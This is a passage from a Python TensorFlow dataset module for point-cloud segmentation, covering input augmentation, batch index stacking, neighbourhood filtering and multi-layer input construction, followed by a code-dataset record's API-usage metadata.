int(cloud_ind) # cloud idx\n # np.array([cloud_ind], dtype=np.int32)\n )\n\n # Define the generator that should be used for this split\n valid_split = ('training', 'validation', 'test')\n assert split in valid_split, ValueError(f'invalid split = {split} not in {valid_split}')\n\n # Define generated types and shapes\n gen_func = spatially_regular_gen\n gen_types = (tf.float32, tf.float32, tf.int32, tf.int32, tf.int32)\n # N = None\n N = self.config.in_points\n gen_shapes = ([N, 3], [N, 6], [N], [N], []) # after batch : [B, N, 3], [B, N, 6], [B, N], [B, N], [B]\n # gen_shapes = ([N, 3], [N, 6], [N], [N], [1])\n return gen_func, gen_types, gen_shapes\n\n\n def tf_augment_input(self, stacked_points, batch_inds):\n \"\"\"\n Augment inputs with rotation, scale and noise\n Args:\n batch_inds : [BxN] - batch idx for each point\n \"\"\"\n # Parameter\n config = self.config\n num_batches = batch_inds[-1] + 1\n\n ##########\n # Rotation\n ##########\n if config.augment_rotation == 'none':\n R = tf.eye(3, batch_shape=(num_batches,)) # [BxN, 3, 3]\n elif config.augment_rotation == 'vertical': # -- used in default cfgs\n # Choose a random angle for each element\n theta = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n # Rotation matrices\n c, s = tf.cos(theta), tf.sin(theta)\n cs0 = tf.zeros_like(c)\n cs1 = tf.ones_like(c)\n R = tf.stack([c, -s, cs0, s, c, cs0, cs0, cs0, cs1], axis=1)\n R = tf.reshape(R, (-1, 3, 3)) # [B, 3, 3]\n # Create N x 3 x 3 rotation matrices to multiply with stacked_points\n stacked_rots = tf.gather(R, batch_inds) # [BxN, 3, 3]\n # Apply rotations\n if len(stacked_rots.shape) == len(stacked_points.shape):\n stacked_rots = tf.expand_dims(stacked_rots, axis=-3) # [BxN, 1, 3, 3] to match [B, N, 1, 3]\n stacked_points = tf.reshape(tf.matmul(tf.expand_dims(stacked_points, axis=-2), # to row vec: [BxN, 3] -> [BxN, 1, 3]\n stacked_rots),\n tf.shape(stacked_points))\n elif config.augment_rotation == 'arbitrarily':\n cs0 = tf.zeros((num_batches,))\n cs1 = tf.ones((num_batches,))\n # x rotation\n thetax = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n cx, sx = tf.cos(thetax), tf.sin(thetax)\n Rx = tf.stack([cs1, cs0, cs0, cs0, cx, -sx, cs0, sx, cx], axis=1)\n Rx = tf.reshape(Rx, (-1, 3, 3))\n # y rotation\n thetay = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n cy, sy = tf.cos(thetay), tf.sin(thetay)\n Ry = tf.stack([cy, cs0, -sy, cs0, cs1, cs0, sy, cs0, cy], axis=1)\n Ry = tf.reshape(Ry, (-1, 3, 3))\n # z rotation\n thetaz = tf.random.uniform((num_batches,), minval=0, maxval=2 * np.pi)\n cz, sz = tf.cos(thetaz), tf.sin(thetaz)\n Rz = tf.stack([cz, -sz, cs0, sz, cz, cs0, cs0, cs0, cs1], axis=1)\n Rz = tf.reshape(Rz, (-1, 3, 3))\n # whole rotation\n Rxy = tf.matmul(Rx, Ry)\n R = tf.matmul(Rxy, Rz)\n # Create N x 3 x 3 rotation matrices to multiply with stacked_points\n stacked_rots = tf.gather(R, batch_inds)\n # Apply rotations\n if len(stacked_rots.shape) < len(stacked_points.shape):\n stacked_rots = tf.expand_dims(stacked_rots, axis=-3) # [B, 1, 3, 3] to match [B, N, 1, 3]\n stacked_points = tf.reshape(tf.matmul(tf.expand_dims(stacked_points, axis=-2), stacked_rots), tf.shape(stacked_points))\n else:\n raise ValueError('Unknown rotation augmentation : ' + self.augment_rotation)\n\n #######\n # Scale\n #######\n # Choose random scales for each example\n min_s = config.augment_scale_min\n max_s = config.augment_scale_max\n if config.augment_scale_anisotropic: # each batch a scale - [B, 3/1]\n s = tf.random.uniform((num_batches, 3), 
minval=min_s, maxval=max_s) # xyz diff scale \n else:\n s = tf.random.uniform((num_batches, 1), minval=min_s, maxval=max_s) # xyz same scale\n symmetries = []\n for i in range(3):\n if config.augment_symmetries[i]: # could flip (multiply by 1/-1)\n symmetries.append(tf.round(tf.random.uniform((num_batches, 1))) * 2 - 1)\n else:\n symmetries.append(tf.ones([num_batches, 1], dtype=tf.float32))\n s *= tf.concat(symmetries, 1) # [B, 3]\n # Create N x 3 vector of scales to multiply with stacked_points\n stacked_scales = tf.gather(s, batch_inds) # [BxN, 3]\n # Apply scales\n if len(stacked_scales.shape) < len(stacked_points.shape):\n stacked_scales = tf.expand_dims(stacked_scales, axis=-2) # [B, 1, 3] to match [B, N, 3]\n stacked_points = stacked_points * stacked_scales\n\n #######\n # Noise\n #######\n noise = tf.random_normal(tf.shape(stacked_points), stddev=config.augment_noise) # per-point noise\n stacked_points = stacked_points + noise\n return stacked_points, s, R\n\n def tf_get_batch_inds(self, stacks_len):\n \"\"\"\n Method computing the batch indices of all points, given the batch element sizes (stack lengths). Example:\n From [3, 2, 5], it would return [0, 0, 0, 1, 1, 2, 2, 2, 2, 2]\n \"\"\"\n\n # Initiate batch inds tensor\n num_batches = tf.shape(stacks_len)[0]\n num_points = tf.reduce_sum(stacks_len)\n batch_inds_0 = tf.zeros((num_points,), dtype=tf.int32)\n\n # Define body of the while loop\n def body(batch_i, point_i, b_inds):\n num_in = stacks_len[batch_i]\n num_before = tf.cond(tf.less(batch_i, 1),\n lambda: tf.zeros((), dtype=tf.int32),\n lambda: tf.reduce_sum(stacks_len[:batch_i]))\n num_after = tf.cond(tf.less(batch_i, num_batches - 1),\n lambda: tf.reduce_sum(stacks_len[batch_i + 1:]),\n lambda: tf.zeros((), dtype=tf.int32))\n\n # Update current element indices\n inds_before = tf.zeros((num_before,), dtype=tf.int32)\n inds_in = tf.fill((num_in,), batch_i)\n inds_after = tf.zeros((num_after,), dtype=tf.int32)\n n_inds = tf.concat([inds_before, inds_in, inds_after], axis=0)\n\n b_inds += n_inds\n\n # Update indices\n point_i += stacks_len[batch_i]\n batch_i += 1\n\n return batch_i, point_i, b_inds\n\n def cond(batch_i, point_i, b_inds):\n return tf.less(batch_i, tf.shape(stacks_len)[0])\n\n _, _, batch_inds = tf.while_loop(cond,\n body,\n loop_vars=[0, 0, batch_inds_0],\n shape_invariants=[tf.TensorShape([]), tf.TensorShape([]),\n tf.TensorShape([None])])\n\n return batch_inds\n\n def tf_stack_batch_inds(self, stacks_len, tight=False):\n impl = self.config.tf_stack_batch_inds\n impl = impl if impl else 'while'\n impl = impl.replace('tf', '')\n return getattr(self, f'tf_stack_batch_inds_{impl}')(stacks_len, tight)\n\n def tf_stack_batch_inds_while(self, stacks_len, tight=False):\n \"\"\"\n Stack the flat point idx, given the batch element sizes (stacks_len)\n E.g. 
stacks_len = [3, 2, 5]; n = sum(stacks_len) = 10\n => return: [[0, 1, 2, n, n, n], \n [3, 4, n, n, n, n],\n [5, 6, 7, 8, 9, n]]\n \"\"\"\n # Initiate batch inds tensor\n num_points = tf.reduce_sum(stacks_len)\n max_points = tf.reduce_max(stacks_len)\n batch_inds_0 = tf.zeros((0, max_points), dtype=tf.int32)\n\n # Define body of the while loop\n def body(batch_i, point_i, b_inds):\n # Create this element's indices\n element_inds = tf.expand_dims(tf.range(point_i, point_i + stacks_len[batch_i]), axis=0)\n # Pad to right size\n padded_inds = tf.pad(element_inds,\n [[0, 0], [0, max_points - stacks_len[batch_i]]],\n \"CONSTANT\",\n constant_values=num_points)\n # Concatenate batch indices\n b_inds = tf.concat((b_inds, padded_inds), axis=0)\n # Update indices\n point_i += stacks_len[batch_i]\n batch_i += 1\n return batch_i, point_i, b_inds\n\n def cond(batch_i, point_i, b_inds):\n return tf.less(batch_i, tf.shape(stacks_len)[0])\n\n fixed_shapes = [tf.TensorShape([]), tf.TensorShape([]), tf.TensorShape([None, None])]\n _, _, batch_inds = tf.while_loop(cond,\n body,\n loop_vars=[0, 0, batch_inds_0],\n shape_invariants=fixed_shapes)\n\n # Add a trailing shadow-neighbor column when every row is already full (i.e., no padding slot exists yet)\n def f1(): return tf.pad(batch_inds, [[0, 0], [0, 1]], \"CONSTANT\", constant_values=num_points)\n def f2(): return batch_inds\n if not tight:\n batch_inds = tf.cond(tf.equal(num_points, max_points * tf.shape(stacks_len)[0]), true_fn=f1, false_fn=f2)\n\n return batch_inds\n\n def tf_stack_batch_inds_map(self, stacks_len, tight=False):\n # Initiate batch inds tensor\n B_inds = tf.range(tf.shape(stacks_len)[0]) # [B]\n num_points = tf.reduce_sum(stacks_len)\n max_points = tf.reduce_max(stacks_len)\n if not tight:\n max_points += 1\n def flatten_idx(batch_i):\n cur_len = stacks_len[batch_i]\n start_i = tf.reduce_sum(stacks_len[:batch_i])\n element_inds = tf.range(start_i, start_i + cur_len) # Create this element's indices (starting at 0)\n padded_inds = tf.pad(element_inds, [[0, max_points - cur_len]], \"CONSTANT\", constant_values=num_points) # [max_points] Pad to right size\n return padded_inds\n batch_inds = tf.map_fn(flatten_idx, B_inds, dtype=tf.int32)\n return batch_inds\n\n def big_neighborhood_filter(self, neighbors, layer):\n \"\"\"\n Filter neighborhoods with max number of neighbors. 
Limit is set to keep XX% of the neighborhoods untouched.\n Limit is computed at initialization\n \"\"\"\n # crop neighbors matrix\n neighbors = neighbors[:, :self.neighborhood_limits[layer]]\n # neighbors = tf.reshape(neighbors, [-1, self.neighborhood_limits[layer]])\n return neighbors\n\n\n def tf_segmentation_inputs_radius(self,\n stacked_points,\n stacked_features,\n point_labels,\n stacks_lengths,\n batch_inds):\n from ops import get_tf_func\n tf_batch_subsampling = get_tf_func(self.config.sample, verbose=self.verbose)\n tf_batch_neighbors = get_tf_func(self.config.search, verbose=self.verbose)\n\n # Batch weight at each point for loss (inverse of stacks_lengths for each point)\n min_len = tf.reduce_min(stacks_lengths, keepdims=True)\n batch_weights = tf.cast(min_len, tf.float32) / tf.cast(stacks_lengths, tf.float32)\n stacked_weights = tf.gather(batch_weights, batch_inds)\n # Starting radius of convolutions\n dl = self.config.first_subsampling_dl\n dp = self.config.density_parameter\n r = dl * dp / 2.0\n # Lists of inputs\n num_layers = self.config.num_layers\n downsample_times = num_layers - 1\n input_points = [None] * num_layers\n input_neighbors = [None] * num_layers\n input_pools = [None] * num_layers\n input_upsamples = [None] * num_layers\n input_batches_len = [None] * num_layers\n\n input_upsamples[0] = tf.zeros((0, 1), dtype=tf.int32) # no upsample for input pt\n for dt in range(0, downsample_times): # downsample times\n neighbors_inds = tf_batch_neighbors(stacked_points, stacked_points, stacks_lengths, stacks_lengths, r)\n pool_points, pool_stacks_lengths = tf_batch_subsampling(stacked_points, stacks_lengths, sampleDl=2 * dl)\n pool_inds = tf_batch_neighbors(pool_points, stacked_points, pool_stacks_lengths, stacks_lengths, r)\n up_inds = tf_batch_neighbors(stacked_points, pool_points, stacks_lengths, pool_stacks_lengths, 2 * r)\n\n neighbors_inds = self.big_neighborhood_filter(neighbors_inds, dt)\n pool_inds = self.big_neighborhood_filter(pool_inds, dt)\n up_inds = self.big_neighborhood_filter(up_inds, dt)\n\n input_points[dt] = stacked_points\n input_neighbors[dt] = neighbors_inds\n input_pools[dt] = pool_inds\n input_upsamples[dt + 1] = up_inds\n input_batches_len[dt] = stacks_lengths\n stacked_points = pool_points\n stacks_lengths = pool_stacks_lengths\n r *= 2\n dl *= 2\n\n # last (downsampled) layer points\n neighbors_inds = tf_batch_neighbors(stacked_points, stacked_points, stacks_lengths, stacks_lengths, r)\n neighbors_inds = self.big_neighborhood_filter(neighbors_inds, downsample_times)\n input_points[downsample_times] = stacked_points\n input_neighbors[downsample_times] = neighbors_inds\n input_pools[downsample_times] = tf.zeros((0, 1), dtype=tf.int32)\n input_batches_len[downsample_times] = stacks_lengths\n\n # Batch unstacking (with first layer indices for optional classif loss) - in_batches - input stage\n stacked_batch_inds_0 = self.tf_stack_batch_inds(input_batches_len[0])\n # Batch unstacking (with last layer indices for optional classif loss) - out_batches - most down-sampled stage\n stacked_batch_inds_1 = self.tf_stack_batch_inds(input_batches_len[-1])\n\n # list of network inputs\n input_dict = {\n 'points': tuple(input_points),\n 'neighbors': tuple(input_neighbors),\n 'pools': tuple(input_pools),\n 'upsamples': tuple(input_upsamples),\n 'batches_len': tuple(input_batches_len),\n 'features': stacked_features,\n 'batch_weights': stacked_weights,\n 'in_batches': stacked_batch_inds_0,\n 'out_batches': stacked_batch_inds_1,\n 'point_labels': point_labels,\n 
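# 'points'/'neighbors'/'pools'/'upsamples' are per-layer tuples; the empty (0, 1) int32 tensors above\n # mark stages where that operation does not apply (no upsample at the input, no pool at the last layer)\n 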
}\n\n return input_dict\n\n def tf_segmentation_inputs_fixed_size(self, points, features, point_labels): # [B, N, 3], [B, N, d], [B, N]\n\n config = self.config\n assert config.sample in ['random', 'farthest'], f'not supported fixed-size sampling {self.config.sample}'\n assert config.search in ['knn'], f'not supported fixed-size neighbor searching {self.config.search}'\n sample_func = get_tf_func(config.sample, verbose=self.verbose)\n search_func = get_tf_func(config.search, verbose=self.verbose)\n\n num_layers = config.num_layers\n downsample_times = num_layers - 1\n\n # Lists of config\n k_search = config.kr_search if isinstance(config.kr_search, list) else [int(config.kr_search)] * num_layers # k-nn for at each layer (stage)\n k_sample = config.kr_sample if isinstance(config.kr_sample, list) else [int(config.kr_sample)] * downsample_times # k-nn for subsampling\n k_sample_up = config.kr_sample_up if isinstance(config.kr_sample_up, list) else [int(config.kr_sample_up)] * downsample_times # k-nn for upsampling\n r_sample = config.r_sample if isinstance(config.r_sample, list) else [int(config.r_sample)] * downsample_times # ratio for subsampling\n\n # Lists of inputs\n input_points = [None] * num_layers\n input_neighbors = [None] * num_layers\n input_pools = [None] * num_layers\n input_upsamples = [None] * num_layers\n input_batches_len = [None] * num_layers\n\n n_points = self.config.in_points # N at each layer (stage)\n input_upsamples[0] = tf.zeros((0, 1), dtype=tf.int32) # no upsample for input pt\n for dt in range(0, downsample_times):\n neighbors_inds = search_func(points, points, k_search[dt])\n pool_points = sample_func(points, n_points // r_sample[dt])\n # pool_points = tf.gather(points, down_inds, batch_dims=1)\n pool_inds = search_func(pool_points, points, k_sample[dt])\n up_inds = search_func(points, pool_points, k_sample_up[dt])\n\n input_points[dt] = points\n input_neighbors[dt] = neighbors_inds\n input_pools[dt] = pool_inds\n input_upsamples[dt + 1] = up_inds\n points = pool_points\n n_points = int(pool_points.shape[-2]) if isinstance(pool_points.shape[-2].value, int) else tf.shape(pool_points)[-2]\n\n # last (downsampled) layer points\n neighbors_inds = search_func(points, points, k_search[downsample_times])\n input_points[downsample_times] = points\n input_neighbors[downsample_times] = neighbors_inds\n input_pools[downsample_times] = tf.zeros((0, 1), dtype=tf.int32)\n\n # # Batch unstacking (with first layer indices for optional classif loss) - in_batches\n # stacked_batch_inds_0 = self.tf_stack_batch_inds(input_batches_len[0])\n # # Batch unstacking (with last layer indices for optional classif loss) - out_batches\n # stacked_batch_inds_1 = self.tf_stack_batch_inds(input_batches_len[-1])\n\n # list of network inputs\n input_dict = {\n 'points': tuple(input_points),\n 'neighbors': tuple(input_neighbors),\n 'pools': tuple(input_pools),\n 'upsamples': tuple(input_upsamples),\n # 'batches_len': tuple(input_batches_len),\n 'features': features,\n # 'batch_weights': stacked_weights,\n # 'in_batches': stacked_batch_inds_0,\n # 'out_batches': stacked_batch_inds_1,\n 'point_labels': point_labels,\n }\n\n return input_dict\n\n\n def get_class_cnt(self, split='train-val'):\n if hasattr(self, 'class_cnt'):\n return self.class_cnt\n class_cnt = np.zeros(self.num_classes)\n for s in split.split('-'):\n s = self.valid_split(s)\n for labels in self.input_labels[s]:\n idx, cnt = np.unique(labels, return_counts=True)\n idx = self.label_to_idx[idx].astype(int)\n mask = np.where(idx >= 0)\n 
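# label_to_idx maps ignored labels to -1, so this mask keeps only the valid classes\n 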
idx = idx[mask]\n cnt = cnt[mask]\n class_cnt[idx] += cnt\n self.class_cnt = class_cnt\n return self.class_cnt\n", "repo_name": "LiyaoTang/contrastBoundary", "sub_path": "tensorflow/datasets/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 44177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 117, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 103, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 109, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Iterator.from_structure", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 143, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Iterator.from_structure", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 169, "usage_type": "attribute"}, {"api_name": 
"numpy.random.normal", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.sort", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 191, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 211, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_generator", "line_number": 222, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Iterator.from_structure", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 239, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 241, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 252, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 258, "usage_type": "call"}, {"api_name": "time.time", "line_number": 262, "usage_type": "call"}, {"api_name": "time.time", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 270, "usage_type": "call"}, {"api_name": "time.time", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 274, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 284, "usage_type": "attribute"}, {"api_name": "numpy.cumsum", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 289, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 313, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 327, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 380, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 394, "usage_type": "attribute"}, {"api_name": "numpy.square", 
"line_number": 395, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 402, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 406, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 409, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 418, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 421, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 422, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 443, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 444, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 448, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 449, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 449, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 473, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 485, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 485, "usage_type": "attribute"}, {"api_name": "numpy.random.shuffle", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 496, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 499, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 510, "usage_type": "attribute"}, {"api_name": "numpy.square", "line_number": 511, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 515, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 519, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 527, "usage_type": "attribute"}, {"api_name": "numpy.hstack", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 528, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 530, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 541, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 
541, "usage_type": "attribute"}, {"api_name": "tensorflow.eye", "line_number": 563, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 566, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 566, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 566, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 568, "usage_type": "call"}, {"api_name": "tensorflow.zeros_like", "line_number": 569, "usage_type": "call"}, {"api_name": "tensorflow.ones_like", "line_number": 570, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 571, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 572, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 574, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 577, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 578, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 580, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 582, "usage_type": "call"}, {"api_name": "tensorflow.ones", "line_number": 583, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 585, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 585, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 585, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 586, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 586, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 587, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 588, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 590, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 590, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 590, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 591, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 591, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 592, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 593, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 595, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 595, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 595, "usage_type": "attribute"}, {"api_name": "tensorflow.cos", "line_number": 596, "usage_type": "call"}, {"api_name": "tensorflow.sin", "line_number": 596, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 598, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 600, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 601, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 603, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 606, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 607, "usage_type": "call"}, {"api_name": 
"tensorflow.expand_dims", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 607, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 618, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 618, "usage_type": "attribute"}, {"api_name": "tensorflow.random.uniform", "line_number": 620, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 620, "usage_type": "attribute"}, {"api_name": "tensorflow.round", "line_number": 624, "usage_type": "call"}, {"api_name": "tensorflow.random.uniform", "line_number": 624, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 624, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 626, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 626, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 629, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 632, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 638, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 638, "usage_type": "call"}, {"api_name": 